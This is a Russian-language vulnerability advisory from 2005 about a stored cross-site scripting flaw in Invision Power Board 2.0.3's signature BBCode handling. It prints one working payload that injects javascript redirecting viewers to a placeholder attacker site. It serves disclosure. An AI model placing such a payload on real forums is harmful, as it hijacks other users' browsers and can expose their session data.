Межсайтовый скриптинг в Invision Power Board

Дата публикации:
31.03.2005
Всего просмотров:
2936
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Invision Power Board 2.0.3

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к важным данным других пользователей.

Уязвимость существует из-за некорректной обработки входных данных в некоторых BBCode тегах в подписи. Удаленный пользователь может с помощью специально сформированного тега сохранить злонамеренную подпись, которая будет отображаться в каждом сообщении злоумышленника, и выполнить произвольный HTML сценарий в браузере других пользователей. Пример:

[COLOR=[IMG]http://server/=`image.jpg[/IMG]]`style
=background:url("javascrip t:document.location.replace('http://[attackersite]');")

URL производителя: www.invisionboard.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Invision Power Board v2.0.3 XSS vulnerabilities

или введите имя

CAPTCHA